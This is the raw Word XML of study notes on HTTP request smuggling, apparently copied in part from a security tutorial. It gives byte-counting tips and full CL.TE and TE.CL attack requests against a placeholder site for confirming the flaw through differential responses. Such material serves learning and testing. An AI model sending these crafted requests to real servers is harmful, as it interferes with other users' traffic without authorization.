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09E8C" w14:textId="66D9B58B" w:rsidR="00831B46" w:rsidRDefault="00831B46" w:rsidP="00B97C6A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>** content length</w:t>
      </w:r>
      <w:r w:rsidR="006F33EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is entire body besdies the first blank line</w:t>
      </w:r>
      <w:r w:rsidR="00607A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AE5519" w14:textId="72FC3A43" w:rsidR="00F15A96" w:rsidRDefault="00F15A96" w:rsidP="00B97C6A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>** for when using a post request as the smuggled request, when calulcating bytes in hex only go to the end of the body not including an new line chars after the body text **</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D06B0E5" w14:textId="77777777" w:rsidR="00B309F1" w:rsidRPr="00B309F1" w:rsidRDefault="00B309F1" w:rsidP="00B309F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B309F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>***** When testing TE.CL the TE bytes go from the start of the second request to the end of the body NOT included the new line chars *****</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BD0441" w14:textId="77777777" w:rsidR="00B309F1" w:rsidRPr="00B309F1" w:rsidRDefault="00B309F1" w:rsidP="00B309F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B309F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">** the normal request content length should only count the TE bytes and its 2 new line chars (typically should be 4 for the main content length)*** </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2258FAE5" w14:textId="77777777" w:rsidR="00B309F1" w:rsidRPr="00B309F1" w:rsidRDefault="00B309F1" w:rsidP="00B309F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B309F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>** inner content length should be larger then the entire body include the 0 and 4 new line chars **</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771D605C" w14:textId="326B4215" w:rsidR="00B309F1" w:rsidRDefault="00B309F1" w:rsidP="00B97C6A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>** Try using both get and post requests for the smuggled request. The main request should generally always be post **</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F83A780" w14:textId="576CEF99" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B97C6A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Confirming HTTP request smuggling vulnerabilities using differential responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BDD5CE" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>When a probable request smuggling vulnerability has been detected, you can obtain further evidence for the vulnerability by exploiting it to trigger differences in the contents of the application's responses. This involves sending two requests to the application in quick succession:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C026DD" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B97C6A">
        <w:t>An "attack" request that is designed to interfere with the processing of the next request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579FBCD5" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B97C6A">
        <w:t>A "normal" request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261C1B56" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>If the response to the normal request contains the expected interference, then the vulnerability is confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F51718F" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>For example, suppose the normal request looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127E4116" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>POST /search HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10939D12" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FD783C" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFA4E37" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Content-Length: 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C978B91" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A"/>
    <w:p w14:paraId="4CD20F9E" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>q=smuggling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AE075A" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>This request normally receives an HTTP response with status code 200, containing some search results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5CD132" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00B97C6A">
        <w:t>The attack request that is needed to interfere with this request depends on the variant of request smuggling that is present: CL.TE vs TE.CL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D18D77C" w14:textId="35331926" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97C6A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>onfirming CL.TE vulnerabilities using differential responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0F883D" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>To confirm a CL.TE vulnerability, you would send an attack request like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EA5DFB" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:lastRenderedPageBreak/>
        <w:t>POST /search HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25244D83" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBE6092" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8BB3E8" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Content-Length: 49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4081904A" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45894BE3" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A"/>
    <w:p w14:paraId="3F31179C" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596394D6" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>q=smuggling&amp;x=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C51B56D" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A9EEB7" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A"/>
    <w:p w14:paraId="2337AD56" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>GET /404 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A018154" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Foo: x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CB3920" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>If the attack is successful, then the last two lines of this request are treated by the back-end server as belonging to the next request that is received. This will cause the subsequent "normal" request to look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5B50A7" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>GET /404 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0331C9D9" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Foo: xPOST /search HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28193FA2" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAAED5D" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1760EC84" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Content-Length: 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5E54CC" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A"/>
    <w:p w14:paraId="49E815F0" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>q=smuggling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679E6D87" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Since this request now contains an invalid URL, the server will respond with status code 404, indicating that the attack request did indeed interfere with it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D6A67A" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B97C6A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Confirming TE.CL vulnerabilities using differential responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BD6F43" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>To confirm a TE.CL vulnerability, you would send an attack request like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6362281E" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>POST /search HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A9EB61" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB7B1F7" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3346BF" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Content-Length: 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602DC415" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:lastRenderedPageBreak/>
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C84A65" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A"/>
    <w:p w14:paraId="5CDAECB1" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>7c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B720A2" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>GET /404 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6BDAFD" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBD0A94" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384BB48C" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Content-Length: 144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5A1E19" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A"/>
    <w:p w14:paraId="5B418A9C" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>x=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6F613A" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F1F71D" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B97C6A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A1F5EA" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>To send this request using Burp Repeater, you will first need to go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7863FECD" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>You need to include the trailing sequence \r\n\r\n following the final 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F32F4C9" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>If the attack is successful, then everything from GET /404 onwards is treated by the back-end server as belonging to the next request that is received. This will cause the subsequent "normal" request to look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E595AA" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>GET /404 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AB8203" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A76C1A" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB186F" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Content-Length: 146</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B151EE2" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A"/>
    <w:p w14:paraId="344EA5A9" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>x=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48360AE7" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4D16D5" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A"/>
    <w:p w14:paraId="1471DE32" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>POST /search HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F65DE75" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3214147C" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476294C4" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Content-Length: 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF1F421" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A"/>
    <w:p w14:paraId="7C2F500E" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:lastRenderedPageBreak/>
        <w:t>q=smuggling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1F2086" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRPr="00B97C6A" w:rsidRDefault="00B97C6A" w:rsidP="00B97C6A">
      <w:r w:rsidRPr="00B97C6A">
        <w:t>Since this request now contains an invalid URL, the server will respond with status code 404, indicating that the attack request did indeed interfere with i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E89641" w14:textId="77777777" w:rsidR="00B97C6A" w:rsidRDefault="00B97C6A"/>
    <w:sectPr w:rsidR="00B9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055E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AFD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87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A0"/>
    <w:rsid w:val="0005478F"/>
    <w:rsid w:val="0033170D"/>
    <w:rsid w:val="00531A6F"/>
    <w:rsid w:val="00607A53"/>
    <w:rsid w:val="006F33EB"/>
    <w:rsid w:val="00831B46"/>
    <w:rsid w:val="00993D6C"/>
    <w:rsid w:val="00B309F1"/>
    <w:rsid w:val="00B40BE9"/>
    <w:rsid w:val="00B6423B"/>
    <w:rsid w:val="00B97C6A"/>
    <w:rsid w:val="00BF54A0"/>
    <w:rsid w:val="00C762D7"/>
    <w:rsid w:val="00D05403"/>
    <w:rsid w:val="00D52582"/>
    <w:rsid w:val="00E84DDC"/>
    <w:rsid w:val="00F1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4CE09"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AD2E2534-E2B1-4C26-9A78-ACD97854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4A0"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00BF5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4A0"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00BF54A0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00BF54A0"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00BF54A0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00BF5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4A0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
